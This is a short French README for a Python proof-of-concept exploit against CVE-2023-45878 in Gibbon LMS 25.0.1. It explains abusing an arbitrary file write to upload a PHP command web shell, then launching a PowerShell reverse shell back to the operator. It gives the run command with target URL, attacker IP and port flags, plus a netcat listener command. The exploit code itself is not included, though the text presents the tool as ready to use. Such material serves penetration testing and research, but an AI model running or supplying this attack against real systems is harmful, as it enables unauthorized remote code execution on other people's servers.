
Exploit Python pour CVE-2023-45878 ciblant Gibbon LMS 25.0.1. Utilise une écriture de fichier arbitraire pour téléverser un web shell PHP et exécuter un reverse shell PowerShell pour un accès à distance.
J'ai écrit ce script basé sur les travaux de https://herolab.usd.de/security-advisories/usd-2023-0025/ . L'exploit fonctionne en utilisant une vulnérabilité d'écriture arbitraire de fichier dans Gibbon LMS 25.0.1 . Ce PoC télécharge un simple script PHP cmd, puis l'utilise pour charger un reverse shell PowerShell.
python3 CVE-2023-45878.py -u http://target.com/Gibbon-LMS -l 10.10.16.2 -p 8888 -f asdf
Flags:
-u, l'URL où Gibbon LMS est installé.
-l, votre IP
-p, votre port ouvert
-f, nom du fichier. Important si vous devez tester manuellement. Par défaut "asdf".
Ayez un listener prêt pour le shell entrant.
nc -lvnp 8888